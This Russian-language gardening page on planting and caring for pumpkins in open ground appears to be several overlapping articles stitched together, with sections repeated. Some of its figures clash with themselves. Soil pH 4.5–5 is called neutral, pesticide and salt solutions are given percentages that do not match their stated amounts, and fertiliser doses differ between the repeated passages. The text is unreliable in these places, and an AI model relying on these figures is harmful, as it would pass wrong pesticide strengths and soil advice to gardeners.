7 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Полезная тыква посадка и уход в открытом грунте

Тыква: посадка и уход в открытом грунте

Тыква — овощная культура с прекрасным вкусом, широко применяется в кулинарии и меет массу полезных свойств. Чтобы выросла действительно вкусная и полезная тыква, посадка и уход в открытом грунте должны проводиться по всем правилам агротехники. Не менее важно выбрать подходящий сорт.

Наиболее известные сорта

В Подмосковье и Ленинградской области:

  • Сорт столовой тыквы Премьера. Устойчив к холодам, характеризуется удлиненной разветвленной плетью, сахарными и довольно объемистыми плодами, достигающими веса 6 кг. Урожай не зависит от плодородности почвы и ее типа.
  • Сорт тыквы Дачная. Раннеспелая, срок созревания — 80 дней. У этого сорта характерный приятный сладкий вкус с выраженными ванильными нотами. Вес зрелого плода составляет 3-4 кг. Хранится урожай не менее 4-х месяцев. Возможно выращивание столовой тыквы в открытом грунте
  • Россиянка. Холодоустойчивый сорт, мало восприимчивый болезням садовых культур. Мякоть ценится в кулинарии благодаря своей сочности и сахарному вкусу. Вес зрелой тыквы около 3-4 кг. Урожай созревает примерно за 120 дней. Овощи окрашены в выраженный оранжевый цвет — это основная особенность сорта.
  • Мускатная тыква Жемчужина. Срок созревания мускатных тыкв составит 100 дней, масса плодов достигает 5-7 кг. Вкус отличается выраженными нотами муската. Этот сорт прекрасно реагирует на холода, отсутствие и, напротив, обилие осадков, устойчив к различным болезням.

Мускатная тыква Жемчужина

Сорта для выращивания в Сибири:

  • Веснушка. Вегетативный период у этого сорта составляет 80 дней. На вкус мякоть плода напоминает дыню, сочную и сладкую. Хрустящая структура мякоти сохраняется даже после приготовления. Вес тыквы — не более 3 кг.
  • Улыбка. Этот сорт кустовой, устойчив к резким перепадам температур, морозостойкий, хорошо переносит повышенную влажность. Отличительная особенность — большой срок хранения, не менее одного года, а также прекрасный вкус. Период вегетации составляет примерно 100 дней, овощи достигают массы 2-3 кг.

Как правильно подготовить тыкву к посадке в открытом грунте

Существует два метода агротехники тыквы:

  • высадка непикированной рассады;
  • посев подготовленных семян.

Для предотвращения инфицирования семенной материал нужно протравить в 30% солевом растворе, приготовить его можно растворив в 100 мл воды 2 ст. ложки соли. Пригодные к использованию семена утонут, а больные и бракованные всплывут на поверхность.

Для выращивания тыквы в открытом грунте посевной материал заранее готовят к высаживанию, вымочив его в воде 24 часа, либо в гумате натрия или гумате калия. После извлечения семян из жидкости их нужно оставить в темном помещении на 48 часов при температуре 23°C выше нуля, предварительно накрыв мокрой материей или марлей. Материал должен быть влажным постоянно.

Важно! Использование семян старых урожаев может отрицательно сказаться на всхожести.

Проклюнувшиеся ростки рассаживают в емкости диаметром около 10 см, предварительно подготовив грунтовую смесь из торфа, песка и садовой земли, смешанных в равных количествах.

В Подмосковье тыквенную рассаду пересаживают на постоянное место по мере того, как она выбрасывает третий листок. Не следует высаживать рассаду, возраст которой меньше 30 дней.

Как долго семена прорастают

Температура окружающей среды — главный фактор, влияющий на скорость прорастания семян. Можно получить первые всходы уже через семь суток, если столбик термометра в ночное время не падает ниже 13-14°C. Если же сезон выдался прохладным, через месяц можно увидеть на стеблях 2-3 листа.

Чтобы семечки проросли быстрее, рекомендовано вымачивать их в жидкостях, стимулирующих рост. Сок алоэ, настой древесной золы, сок картофеля и раствор меда — хорошая альтернатива химическим средствам.

Как выбрать место и подготовить землю

Надел для грядки нужно подбирать освещенный солнцем и ровный, располагающийся на удалении от пряморастущих культур. Выбранный участок необходимо заранее удобрить, внеся на каждый квадратный метр 2 ведра перегноя, половину ведра древесных опилок, 2 л древесной золы и 400 г нитрофосфата. Почву рекомендуется перекопать на 50 см вглубь и сформировать грядки шириной около 70 см.

Когда высаживать тыкву в открытый грунт

С наступлением весны (в середине мая), когда термометр стабильно показывает 10°C выше нуля, семена или рассада тыквы высаживаются в просохшую землю. Более ранняя высадка может привести к гниению семян или замедлить рост овощей. Зная, когда нужно сажать тыкву в открытый грунт, удастся выбрать правильный момент и все плоды успеют полностью вызреть.

Правила посадки

Важно! Тыква требовательна к предшественникам. Ее нельзя высаживать на участках, ранее отведенных под картофель, дыни, арбузы или подсолнухи.

Повторно использовать надел рекомендуется только по истечении пяти лет. Ph почвы желателен нейтральный — 4,5-5, как у супесчаной, легко- или среднесуглинистой.

Лунки формируют на расстоянии не менее 90 см друг от друга. Глубина посадки семян — 7 см. Семена помещаются в каждую лунку, заранее политую двумя литрами воды температурой около 50°C выше нуля. Сверху грядку для тыквы нужно засыпать мульчей из опилок, торфа или соломы. В сибирских широтах практикуется высаживание по два семени в одну лунку, а после того, как они прорастут, нужно удалить самый хилый росток.

Посевам будут не страшны заморозки, если создать для них парниковый эффект, для этого нужно накрыть высаженные в открытый грунт семена пленкой, закрепив ее по периметру грядки.

Тыква растёт на грядках

Когда ростки достигнут 50 см, укрытие надо приподнять, натянув на проволочный каркас. С середины июня покрытие можно убрать.

Используя укрывной материал вместо мульчи, заранее вырезав в нем крестообразные формы, можно существенно облегчить уход за тыквой во время роста.

Правила ухода

Вовремя удобряя и правильно поливая тыкву, можно избежать многих сложностей в уходе за ней.

Способы подкормки

Удобрения используются два раза в месяц. Тыкву, высаженную в открытый грунт, дважды подкармливают минеральными добавками:

  • впервые — когда появляется пятый лист, вносят 10 г сухой нитрофоски под каждый куст;
  • второй раз — когда появляются плети, вносят 7 г нитрофоски, разведенной в 5 л воды, под каждое растение.

Не менее полезен прикорм рассады тыквы древесной золой из расчета 1 стакан на 1 корень, а также удобрением из коровьего навоза, замоченного в пропорции 1 л на 10 л воды. Подкормку из коровяка первый раз вносят в начале роста и развития растений из расчета 1 ведро на 6 корней, а затем во время созревания плодов, из расчета 1 ведро на 3 корня.

Для внесения удобрений нужно прорывать канавки вокруг каждого куста, которые следует расширять, когда кусты подрастают с 8 до 15 см. Углубления выкапывают в 15 см друг от друга на этапе рассады, а через полмесяца увеличивают до 40 см.

Правила полива тыквы

До полива почву следует осторожно, не повреждая коневую систему, разрыхлить вглубь до 10 см, а также прополоть сорную траву. Нельзя поливать тыквы в открытом грунте холодной водой, нужно использовать воду, нагретую до 50°C.

В стадии цветения стоит обратить особое внимание на полив:

  • своевременное орошение стимулирует формирование женских соцветий. На этом этапе одному кусту требуется не менее 30 л воды в сутки;
  • в фазе созревания, напротив, следует уменьшить расход воды из-за того, что чрезмерная влажность отрицательно сказывается на сроках хранения и вкусовых качествах урожая.

Зная все секреты правильной посадки и ухода за тыквой в открытом грунте, можно вырастить хороший урожай.

Методы формирования плетей тыквы

Формировать плети тыквы нужно для того, чтобы растение не растрачивало силы на ненужные побеги и завязи, за счет этого плоды получаются намного больше, улучшается их вкус. Основной побег формируют методом прищипывания, когда он достигает длины около 1,5 м. Сохранять нужно два боковых стебля длиной примерно 70 см, на каждом из которых созреет по плоду.

Чтобы стимулировать правильное созревание тыквы, побеги нужно прижать к грунту, слегка присыпав землей для укоренения, в полуметре от основного стебля. Для предотвращения заражения формирующихся плодов грибковыми болезнями под каждый овощ нужно подложить фанеру или стекло, которые будут защищать от контакта с сырой почвой.

Вредители и болезни тыквы

Тыква наиболее подвержена заражению плодовой гнилью, мучнистой росой и мозаикой. Основная причина их появления — бактерии и грибки, развивающиеся из-за повышенной влажности.

Мучнистая роса

Борьба с этой инфекцией будет наиболее эффективна, если начинать ее, обнаружив первые признаки грибка на тыквенных листах. Нужно опрыскать их раствором 3 г марганцовки или 2 г медного купороса, разведенных в 10 л воды. Завязи и листья обрабатывают 1% раствором бордосской жидкости.

Избежать этой болезни можно, соблюдая режим полива, следя за севооборотом и полностью уничтожая зараженные растения.

Тыквенная мозаика

Зараженные растения как можно быстрее нужно убрать с участка и сжечь, так как это вирусное заболевание очень опасно. Для его профилактики нужно своевременно вырывать сорняки, дезинфицировать садовый инвентарь, уничтожать насекомых, вовремя уничтожать очаги инфекции.

Плодовая гниль

Пораженные участки нужно вырезать ножом и обработать свежим соком алоэ. Обработанный участок со временем подсохнет, а тыква продолжит свое развитие.

Методы борьбы с вредителями

Паутинный клещ обходит стороной участки, обработанные настоем из 200 г луковой шелухи в 10 л воды или 20% раствором хлорэтанола (20 г на 10 л воды).

Существенную опасность представляют вредители, которые уменьшают количество урожая или вовсе уничтожают молодые посевы. Среди них:

Нашествие вредителей можно остановить с помощью химических препаратов, например, Актеллик, Фуфанон, Циткор и т.п. Однако безопаснее использовать народные методы борьбы с насекомыми.

Эффективные методы борьбы с тлей — пропалывание сорняков, обработка раствором 200 г твердого мыла в 10 л воды или 10% раствором карбофоса (60 г на 10 л воды).

  • ромашковые настои и отвары;
  • настои из ботвы помидоров и картофеля;
  • отвар полыни или другой травы с резким запахом;
  • древесная зола;
  • табачная пыль;
  • гашеная известь и пр.

Порошкообразными компонентами тыкву опудривают, а жидкими средствами — опрыскивают. Эти мероприятия нужно проводить не менее трех раз с перерывом до 10 суток.

Чтобы не пропустить атаку вредителей, необходимо осматривать грядки каждые три дня. Это может вовремя заметить нашествие и уберечь урожай.

Правила сбора и хранения урожая

Признаки зрелой тыквы:

  • поверхность плодоножки и стебель, проводящий питание, твердеют, становятся похожими наощупь на пробку;
  • высыхают и желтеют листья плети;
  • после созревания на кожуре четче проступает текстура;
  • корку невозможно повредить ногтем;
  • плоды твердые на ощупь;
  • появляется матовый налет;
  • при ударе раздается звонкий звук;
  • плодоножка легко отделяется.

Срывать тыквы следует осторожно, не повреждая корку. Если на кожице все-таки появились повреждения, их заклеивают пластырем, предотвращая попадание микроорганизмов внутрь плода. Собранные овощи должны дозреть в сухом помещении в течение 30 дней.

Секрет получения щедрого урожая кроется в верном подборе семян и надлежащем уходе. Долгой зимой можно побаловать семью вкусными тыквенными лакомствами, которые весьма полезны.

Тыква не капризна в посадке и уходе в открытом грунте, а значит, придерживаясь всех вышеперечисленных рекомендаций, любой огородник может вырастить завидный урожай. Этот овощ не требует особых условий хранения, причем лежать он может до самого Нового Года. Тыква широко применяется в кулинарии, из нее можно готовить основные блюда, супы, десерты, пироги. Она сохраняет все свои полезные свойства при консервации.

Тыква — выращивание в открытом грунте

Тыква – самый крупный овощ выращиваемый на огороде. В тыкве содержится большое количество полезных веществ и витаминов.

Широко используют тыкву в кулинарии, для приготовления различных блюд и заготовок на зиму.

Рассмотрим подробнее как вырастить тыкву на огороде, посев семян, уход в процессе роста, сбор урожая и хранение.

Полезные свойства тыквы

Выращенный овощи полностью используют для приготовления пищи и заготовок. Тыква – кладезь витаминов которые содержаться в мякоти и семечках.

Из семечек делают полезное и вкусное масло, которое является низкоаллергенным, обладает восстанавливающим и противовоспалительным действием.

Мякоть содержит ряд витаминов, в том числе редкий витамин Т, который нормализует обмен веществ в организме.

Тыква богата каротином, диетологи часто назначают тыквенную диету людям страдающим отклонениями в области нарушения зрения. Люди страдающие болезнями желудка и проблемами кишечника практикуют употребление мякоти тыквы.

Масло тыквенных семечек обладает антигельминтным свойством, устраняет запоры.

В кулинарии существует множество рецептов блюд из тыквы.

Многие считают что тыква округлый плод оранжевого или ярко-желтого цвета. Но эта овощная культура разнообразна своим цветом, размером, формой и вкусом плодов. Также есть декоративные и несъедобные сорта.

Когда сажать тыкву в открытый грунт

Тыква южная бахчевая культура которой необходим простор при выращивании. Любит солнечные участки с оптимальной температурой роста +25 градусов. При +14 градусов тыква останавливает рост.

Для выращивания тыквы подходит любая почва, но для получения больших плодов необходима плодородная земля. Ученью на участок внесите минеральные и органические удобрения.

Непосредственно перед посевом в лунки добавляют золу, перегной, суперфосфат. Очень хорошо тыкве подходит свежий навоз.

Такая высеивают семенами прямо в грунт или высаживают при помощи рассады.

Такой вид как мускатная тыква выращивается только при помощи рассады.

Тыква лучше всего растет на участках, где до этого росли свекла, баклажаны, морковь, перец, бобовые, капуста, картофель, помидоры, лук.

Не подходят участки где росли кабачки, огурцы, патиссоны.

Видео – Тыква — выращивание и прищипывание

Посадка семян тыквы в грунт

Перед посевом проведите подготовку семян, прогреть при температуре +40 градусов в течении 9 часов. Затем замочить семена в растворе золы с водой. Для этого семена завернуть в несколько слоев марли и опустить в раствор.

Приготовить раствор: на 1 л горячей воды добавить 2 ст. л. древесной золы. Настаивать 12 часов. Так семена быстро проклюнутся и прорастут. Можно и не готовить семена перед посевом, но срок появления всходов увеличиться

Посадка тыквы пошагово:

Разметить ряды на участке, между рядами не менее 2 м;
Сделать лунки около 30 см размером и расстоянием между ними не менее 1 метра, пролить водой. Некоторые огородники высаживают тыквы в шахматном порядке;
В каждую лунку положить по 3 семечки на глубине 5-6 см.
Посев семян производите в тёплую погоду, можно накрыть участок до появления всходов;
При образовании корки обязательно прорыхлите её;
После всходов оставить в каждой лунке не больше 2 растений, остальные прищипывают, чтобы не травмировать корневую систему.

Тыква – выращивание из рассады

Чаще рассадой выращивают мускатную тыкву.

Посев подготовленных семян производят в плодородную смесь земли в конце апреля.

Лучше сеять сразу в отдельных ёмкостях объемом 0,5 л. Поливайте теплой водой.

Через 30 дней рассаду тыквы высаживают в теплицу или под пленку с расстоянием в 1 м между растениями.

При сохранении ночных заморозков обязательно накрыть пленкой.

В регионах с холодным летом, для получения урожая раньше, необходимо проводить формирование плетей. На растениях оставляют по 2 завязи, остальные прищипните на 50 см выше плода.

Уход за тыквой

Основной уход заключается в прополке, поливе и рыхлении.

Особенности полива тыквы

Тыква влаголюбивое растение, не переносит сухость и зной, поэтому стоит водить полив правильно. Не осуществляйте полив, когда размер плода меньше кулака, будет активно расти листья, плоды не набирать нужных полезных веществ.

В дальнейшем, во время роста плода, производить полив чаще.

Перед сбором урожая за несколько недель прекратить полив, чтобы тыква полежала и набрала сахаров в мякоти.

Первую подкормку проводят перед цветением настоем коровяка (разведённый 1:8 с водой) и фосфорно-калийными удобрениями. Одного ведра достаточно чтобы полить 5-6 кустов.

Вторая подкормка проводится во время цветения древесной золой разведённой в воде (1 стакан на 10 л воды). Одним ведром полить 3 растения.

Проводите рыхление почвы междурядий на 10 см не повреждая корневую систему тыквы. Не забывайте пропалывание участок от сорняков.

Виды и сорта тыквы

Существует много разнообразных видов и сортов тыквы. Сегодня рассмотрим основные 3 вида часто выращиваемые на огороде. Это тыква обыкновенная, мускатная, крупноплодная.

Тыква обыкновенная (твердокорая)

Плод большой, круглой формы, обычно жёлтого цвета. Основное время созревания сентябрь. Семечки с плотной шкуркой белого или желтоватого цвета 3-4 см длиной.

Самые распространенные сорта тыква спагетти, кустовая оранжевая, тыква алтайская 47, грибовская кустовая 189.

Сорт скороспелый, от всходов до сбора урожая понадобится 2 месяца.

При отваривании мякоти этого сорта тыквы, она распадается на волокна, поэтому сорт и получил название спагетти. Употребляют как холодной так и горячей.

Кустовая оранжевая тыква

Сорт с плодами ярко-оранжевого цвета с плодами до 5 кг весом. Мякоть мягкая и сладкая. Хорошо сохраняется всю зиму.

Грибовская кустовая 189

Раннеспелый сорт, очень популярен при выращивании. Растения растет кустом с 2 плодами по 6-7 кг. Плоды каплевидной формы с ярко-оранжевой окраской с зелеными вкраплениями. Толстая, сочная и сладкая мякоть ярко-оранжевого цвета.

Тыква алтайская 47

Раннеспелый сорт универсального назначения. От появления всходов до сбора урожая понадобится 2 месяца. Оранжево-желтые плоды с светло-желтыми, светло-коричневыми полосками. Плоды весом от 2 до 5 кг с твёрдой шкуркой.

Мякоть не обладает выраженной сладостью, волокнистая. Сорт обладает хорошей урожайностью, вынослива к низким температурам, не боится перевозки и хорошо лежит всю зиму.

Теплолюбивый вид тыквы, но зато один из самых вкусных.

Высаживают в основном рассадным способом, вид сочетаем в себе свойства обыкновенной и крупноплодной тыквы. Форма плодов различная, с разной окраской.

На кожуре присутствуют продольные светлые пятна. Мякоть оранжевого или ярко-оранжевого цвета, плотная и нежная, с особенным вкусом и запахом.

Плоды с маленькими семечками серо-белого цвета с темным обликом по краям. Вид обладает мощной и сильной корневой системой до 2 метров длиной.

Тыква сорта мускатная

Поздний сорт тыквы с весом плодов 4-6 кг. Мякоть оранжевого цвета, сочная, плотная, и сладкая.

Позднеспелый сорт, плоды темно-зеленого цвета. Очень сочная, оранжевая мякоть. Масса плодов до 7 кг.

Позднеспелый сорт с темно-зелеными плодами а оранжевую полоску. Плоды весом до 7 кг. Ярко-оранжевая мякоть.

Этот вид по сравнению с предыдущими обладает самыми большими плодами. Окраска тыква может быть серого, белого и розового цвета.

Плоды шаровидной формы. Мякоть волокнистая, мягкая и рыхлая. Часто используют в качестве корма на фермах. Семечки крупные кремового или белого цвета с еле заметным обликом.

Позднеспелый сорт с тыквами серого цвета, шаровидной или немного сплюснутой формы. Сочная, плотная мякоть оранжевого цвета. Хранится около 7 месяцев. Очень урожайный сорт.

Среднеспелый сорт с сплюснутыми тыквами светло-серого цвета. Плоды весом 10 кг и более. Плотная мякоть со сладковатым вкусом, яично-желтого цвета.

Сорт даёт хорошие урожаи и отлично сохраняется всю зиму.

Сбор урожая и хранение тыквы

Лучшее место для хранения тыквы – погреб. Температура должна быть +3 +15 градусов, влажность 75-80 процентов, погреб с вентиляцией обязательно. Хранить на полках, поддонах, но не на земле.

Складывайте тыквы плодоножкой вверх на расстоянии друг от друга, чтобы не соприкасались между собой. Тыквы без плодоножек нужно готовить в первую очередь, поэтому не складывайте далеко.

Твердокорая и крупноплодная тыква – срок сбора урожая начинается осенью, после усыхания плодоножки. После сбора урожая, необходимо чтобы тыквы полежала в теплая для испарения лишней влаги и накопления сахаристости.

Мускатную тыкву начинают убирать в сентябре. Сбор урожая проводят в солнечную погоду. Также оставляют в теплом светлом помещении на несколько дней для дозаривания.

Видео – Тыква — сбор урожая

Тыква посадка и уход в открытом грунте

Тыква — травянистое однолетнее растение, родом из Мексике. В Европу была завезена около 500 лет назад. Сегодня ее выращивают на всех континентах, кроме Антарктиды. В нашей стране тыква любима огородниками и садоводами.

Этот вкусный овощ содержит витамины (редкий витамин Т), микроэлементы и полезные вещества, необходимы человеческому организму . Чтобы вырастить полезную тыкву, посадка и уход в открытом грунте должны соответствовать всем требованиям агрономии.

Сорта тыквы и их особенности

Тыква имеет множество сортов и разновидностей. Каждый по-своему особенный. Они отличаются вкусом, размером, формой одни разноцветные, другие одного тонна. Но все это многообразие разделяется на три группы .

Наиболее известный сорт тыквы среди огородников. Растение неприхотливое, плетущего или кустового типа, с большими листьями темно-зеленого цвета. Такие сорта выращивают на приусадебных участках, так как они отличаются высокой урожайностью. Плоды больших размеров, круглой или овальной формы. Мякоть грубая, но сладкая и вкусная. Этот сорт тыквы очень хорошо хранится, может пролежать всю зиму.

Один из представителей этой группы является сорт крупноплодная « Россиянка »
  • Раннеспелый.
  • Сочные плоды.
  • Большое содержание сахара.
  • Очень хорошо подходит для зимнего хранения.
  1. Твердокорая .

Имеет толстую и плотную кору. Плоды округлой или цилиндрической формы, некрупных размеров. Созревают раньше остальных, можно начинать сбор урожая уже в конце августа. Плоды хранят 1-2 месяц. У них самые вкусные семечки.

К данной группе принадлежит сорт твердокорая « Грибовская кустовая 189 »
  • Раннеспелый.
  • Масса от 2 до 5 кг.
  • Хрустящая, сладкая.
  1. Мускатная .

Самый ароматный и вкусный вид тыквы. Плоды грушевидной формы с мягкой коркой. Данный сорт теплолюбивый , поэтому рекомендуют высаживать на солнечных участках.

И здесь получается сорт Мускатная « Прованская »

  • Среднепоздний.
  • Масса от 3 до 8 кг.
  • Мякоть толстая.
  • Ароматный, очень вкусный.
  • Содержит много кератина.

Выращивание семенами и рассадным способом

В теплых регионах тыкву сразу высеивают семенами на грядку, а в северных спасает ее рассада .

Существует только два метода выращивания тыквы:

  1. Семена высеивают сразу в открытый грунт.
  2. Выращивают рассаду культуры, затем высаживают.

Но в обоих случаях необходимо убедиться, взойдут ли семена, для этого их проращивают.

Отберите семена, выложите их на влажную марлю, оберните и положите в теплое место . Марля регулярно увлажняйте . Через 4 дня семена прорастут и будут готовы к севу. Их высевают на рассаду и сразу на огород.

Рассада нуждается в свежем воздухе и в хорошем освещении, поэтому регулярно проветривайте помещение .Температура в комнате должна быть 24-28° градусов тепла.

Посадка в открытый грунт

Как появились всходы, культуру пересаживаю т на постоянное место. По традиции семена высеивают весной. Территорию подготовляют осенью . Участок перекапывается и удобряется: навозом , компостом . Лучше применять комплексное удобрение , оно хорошо насыщает землю полезными веществами. Участок под посадку выбирают солнечный, хорошо проветриваемый.

К посеву или пикировке на огороде приступают, когда земля прогреется до +15°С . В средней полосе, высаживаю семена в середине мая. Растение активно разрастается, поэтому расстояние между ямками должно быть не меньше 50 см . Глубина заделки семечки 8-10 см , расстояние между рядами 1 метр. Перед самой посадкой рекомендуют полить почву горячей водой.

Чтобы рассада хорошо прижилась , после высадки в открытую почву, создайте ей на неделю парниковые условия . Укройте полиэтиленом.

Уход в открытом грунте

Ухаживать за тыквой не сложно. Своевременно поливайте , подкармливайте , рыхлите почву, защищайте культуру от вредителей и болезней и грамотно формируйте плети.

Полив тыквы

Тыква, как и все бахчевые, нуждается в умеренном поливе. Лишняя влага провоцирует вытягивание всходов. Вода не должно быть холодной , используйте отстоявшуюся жидкость на солнце. Увлажняйте растение после рыхления и прополки. Старайтесь поливать вокруг , чтобы земля возле корня оставалась сухой.

Во время созревания плодов, частоту полива необходимо увеличить, а под конец дозревания совсем прекратить поливать. Культура хорошо переносит засуха, корневая система достигает трехметрового размера, поэтому она всегда найдет в земле влагу.

Подкормка тыквы

Подкармливают растение три раза в сезон:

  1. Когда первый раз окучивают.
  2. Цветет.
  3. Массово образовываются плоды.

Подкармливают растение навозом, куриным пометом, залой.

Свежий помет птиц заливают теплой водой, хорошо перемешивают, добавляют воду до консистенции сметаны. Настаивают в тепле, пока не образуются пузыри. Затем разводят полулитровую банку настоя в ведре воды и поливают тыкву.

Размножение тыквы

Культуру размножают с помощью семечек, которые находятся внутри овоща.

Выбирают большую, хорошо поспевшую тыкву, которая и становится кладезем семян для посадки на следующий год.

Рыхление и прореживание

Корневая система овоща нуждается в кислороде, поэтому рыхлить почву начинают после появления 5 листочка на саженце. Делают это после полива. Во время рыхления сразу же удаляют лишние и поврежденные зеленцы.

Формирование плетей

Из-за большой густоты и огромного количества завязей, в посадках тыквы зачастую замечают гниющий плод. Избежать этого поможет своевременная формировка тыквы (кустовая тыква не формируется). Лишние завязи обрезают, оставляя только 4 плода.

Основной росток формируют системой прищипывания , когда его длина составляет 1,5 м. Оставляют два побега с боку, на них созреет по овощу. Для правильно созревания плода тыквы, побеги придавливают к почве и засыпают землей.

Защита от болезней и вредителей

К основным вредителям овоща относится бахчевая тля .

Ее обнаружить очень просто, начинает опадать завязь , листовая пластина становится морщинистой . Борются с бахчевой тлей народным методом. Натрите на крупной терке 100 г хозяйственного мыла. Добавьте его в ведро с теплой водой и хорошо перемешайте. Готовым раствором опрыскивайте растение.

Достаточно тяжело обнаружить медведку .

Она живет в почве, питается корневищем и стеблем культуры.

Избавиться от медведки можно одним очень эффективным способом. Сварите зерно, смешайте со специальным веществом « Банкол » и разложите по лункам.

В целях профилактики используют препарат « Медветокс ». Во время посадки в каждую лунку кладут по 5 гранул.

Слизни нападают на растение во время сильных дождей. Чтобы избавиться от них, советуют вечером разложить возле растения влажную тряпку, утром все слизни будут на тряпочке.

Мучнистая роса

Это заболевание способно погубить множество овощных культур. Выражается небольшими округлыми белыми пятнами на листве и стебле растения. Со временем этих пятнышек появляется больше . Борются с заболеванием с помощью опрыскивания определенными препаратами.

Бактериоз

Самая страшная болезнь культуры. Очень быстро размножается , спасти растение практически невозможно . Выражается коричневыми пятнами на листьях, язвенными пятнышками на плодах. Борьба подразумевает удаление пораженных участков тыквы и закапывание их на отдаленной территории от огорода.

Сбор и хранение

Созревание тыквы зависит от сорта и климатических условий.

Обратите внимание! Если листья куста выглядят не жизнеспособно, жухлые, на половину сухие, а плодоножка тыквы сухая и жесткая — плод созрел и готов к сбору.

Зрелая тыква имеет насыщенный окрас и плотную кору.

Уборка тыквы приходится поздней осенью. При сборке старайтесь не повреждать поверхность овоща , от того насколько будет целой корка, зависит срок хранения.

Хранят плоды в прохладном темном месте , с влажностью воздуха 70-80%, температурой 2-7° С тепла.

Тыква — овощ не капризный , требует минимального ухода. Соблюдая все требования к содержанию и подкормке культуры, можно добиться хорошего результата .

Тыква — посадка и уход в открытом грунте: секреты хорошего урожая

При соблюдении несложных правил выращивания порадует высоким урожаем тыква, посадка и уход в открытом грунте за которой подробно рассмотрены в нашем материале. Мы расскажем о подготовке и посадке культуры в открытый грунт, поделимся секретами формирования плетей и ухода за тыквой, а также о сборе и хранении урожая.

Тыква (лат. Cucurbita) — богатый витаминами овощ, обладающий приятным мягким вкусом и используемый во многих диетических блюдах. Выращивание культуры требует соблюдения определенных условий и правил, которые мы рассмотрим подробнее.

Подготовка и посадка тыквы в открытый грунт

Выращивание тыквы возможно двумя способами:

  • Высаживанием не пикированной рассады;
  • Засевом подготовленных семян.

Предпосевная обработка семян

Выращивание тыквы в открытом грунте начинается с подготовки семян, которые замачивают в воде, лучше в Гумате натрия или Гумате калия, на сутки. Достав семена из воды их накрывают влажной тканью или марлей на двое суток, оставляя в затененном месте при температуре до плюс 23 гр. по Цельсию. Ткань постоянно увлажняют. Брать семена с урожая позапрошлого года не рекомендуется — может быть плохая всхожесть.

Семена тыквы после проращивания

Для протравки от болезней семена погружают в 30% раствор поваренной соли (2 ст. ложки соли на 100 мл воды). Здоровые и сильные экземпляры погрузятся на дно, а слабые — всплывут и подлежат отбраковке.

После прорастания ростки помещают в стаканчики из пластика или горшки в диаметре до 10 см, с подготовленным грунтом: торфяной смесью вперемешку с песком и садовой землей (1:1:1).

Выращивание рассады тыквы и уход за ней

Пересадка и выращивание тыквы в открытом грунте в Подмосковье происходит после появления трех полноценных листьев. В среднем возраст рассады должен составлять около месяца.

Выбор места и подготовка грунта

Участок, выделенный под выращивание тыквы, выбирают вдалеке от пряморастущих культур, с ровной поверхностью и хорошим доступом солнечного света. Землю предварительно удобряют: на 1 кв.м. берут 2 ведра перегноя, 0,5 ведра древесной стружки, 1 л древесной золы и 200 г нитрофоски. Почву перекапывают вглубь на 50 см и формируют грядки до 70 см в ширину.

Подготовка грядок под посадку тыквы

Высаживают тыквенные семена или рассаду в прогретую почву с середины мая, температура воздуха при этом должна превышать среднесуточные плюс 10 гр. по Цельсию. Если семена высадить раньше, то они не смогут правильно развиваться и загниют.

Выращивание тыквы в открытом грунте на участке, где до этого рос картофель, дыня, подсолнух или арбуз не рекомендуется. На одном месте тыкву высаживают с перерывом в пять лет. Под выращивание тыквы больше всего подходят супесчаные, легко- и среднесуглинистые почвы с нейтральным Ph 4,5-5.

Технология посадки тыквы

Лунки под семена или рассаду делают вдоль всей грядки на расстоянии 0,9-1 м друг от друга и на глубину 5-7 см. В каждую лунку вливают не меньше 2-ух литров воды, температура которой должна быть не ниже плюс 50 гр. по Цельсию, после чего приступают к посеву.

Посев тыквы в открытый грунт

Сверху мульчируют опилками, соломой или торфом. Выращивание тыквы в открытом грунте в Сибири немного отличается: в лунку рекомендуют сеять по 2 семени. После их прорастания, выбирают более слабое растение и удаляют его.

Рассада тыквы после высаживания в открытый грунт

Агротехника выращивания тыквы в открытом грунте включает в себя дополнительное укрытие высаженных семян пленкой, которую тщательно фиксируют вдоль периметра грядки. Укрывной материал создает тепличные условия и помогает защитить всходы от возможных заморозков.

После того, как ростки достигли 50 см в высоту, пленку приподнимают, натягивая ее на каркас из проволоки. В середине июня материал снимают.

Оставленная на грядке пленка без каркаса может использоваться вместо мульчи, что поможет облегчить уход за тыквой во время роста. В укрывном материале при таком использовании делают крестообразные надрезы для ростков.

Тыква выращивание и уход — мульчирование пленкой

Посадка и выращивание тыквы в открытом грунте видео

Правила ухода за тыквой

Уход за тыквой в открытом грунте не вызывает сложностей, так как заключается в своевременном поливе и подкормке.

Внесение удобрений

Вносить подкормки следует не чаще чем раз в 2 недели. Подкормка тыквы в открытом грунте минералами выполняется дважды: при появлении пяти листов (10 г нитрофоски на 1 растение в сухом виде); при появлении плетей (15 г нитрофоски на 10 л воды под каждый куст).

Подкормка тыквы древесной золой (1 стакан на 1 растение) и коровяком (1 л коровяка на 10 л воды) тоже эффективна. Вносят коровяк в начале вегетации (1 ведро на 6 растений) и во время плодоношения (1 ведро на 3 куста).

Подкормка тыквы в открытом грунте

Все подкормки вносят в кольцеобразный ров, увеличивая по мере роста тыквы глубину с 8 до 15 см. На этапе рассады углубление копают на расстоянии 15 см, через 2 недели увеличивают до 40 см.

Полив тыквы

Перед поливом грунт рыхлят вглубь на 10 см, стараясь не зацепить корень, и очищают от бурьянов. Полив тыквы в открытом грунте проводят только теплой водой, 50 гр. по Цельсию, не используют холодную артезианскую или воду из скважин.

Особенно важно своевременное обильное орошение во время цветения: влага необходима для формирования женских соцветий. Расход воды в этот период составляет около 30 л на 1 растение.

Во время созревания плодов количество воды при поливе уменьшают, так как избыточная влага снижает срок хранения и уменьшает сахаристость плодов.

Выращивание тыквы видео

Формирование плетей тыквы

Формирование тыквы при выращивании позволяет не тратить силы на лишние завязи и побеги, за счет чего вырастают более крупные плоды с лучшими вкусовыми характеристиками. В то время как главный стебель достиг длины в 1,5 м, его прищипывают. Оставляют только 2 боковых побега в длину до 70 см. На каждом из них созревает по плоду.

Схема формирования плетей тыквы

Для ускорения налива плодов побеги прижимают к земле, присыпают небольшим слоем грунта на расстоянии до полуметра от главного побега для укоренения. Под каждую формирующуюся тыкву подкладывают кусок фанеры или стекла для защиты от грибковых заболеваний, которые начинают развиваться на плодах от сырости почвы.

Прищипывание и уход за тыквой в открытом грунте видео

Защита тыквы от болезней и вредителей

Самые распространенные заболевания тыквы — плодовая гниль, мучнистая роса и мозаика. Чаще всего проявляются из-за повышенной сырости — благоприятной среды для развития бактерий и грибков. Из вредителей чаще всего поражает тыкву паутинный клещ, а также тля бахчевая.

Мучнистая роса

